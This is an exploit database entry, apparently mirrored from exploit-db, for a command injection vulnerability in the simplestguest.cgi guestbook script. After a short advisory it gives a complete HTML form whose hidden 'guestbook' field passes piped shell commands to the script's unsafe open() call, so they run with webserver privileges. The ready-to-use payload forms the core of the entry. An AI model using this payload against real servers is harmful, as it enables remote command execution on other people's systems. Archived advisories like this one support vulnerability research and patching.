exploit-db-mirror/exploits/cgi/remote/20506.html
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

15 lines
No EOL
983 B
HTML

source: http://www.securityfocus.com/bid/2106/info
A vulnerabiliy exists in Leif M. Wright's simplestguest.cgi, a script designed to coordinate guestbook submissions from website visitors.
An insecure call to the open() function leads to a failure to properly filter shell metacharacters from user supplied input. As a result, it is possible for an attacker to cause this script to execute arbitrary shell commands with the privileges of the webserver.
Make a html form similar to:
<form action=/cgi-bin/simplestguest.cgi method=POST>
                 <input type=hidden name=required value="NAME">
                 <input type=hidden name=guestbook
                value=" | <COMMAND> |">
                 <input type=hidden name="NAME" value="user">
                 <input type=submit>
</form>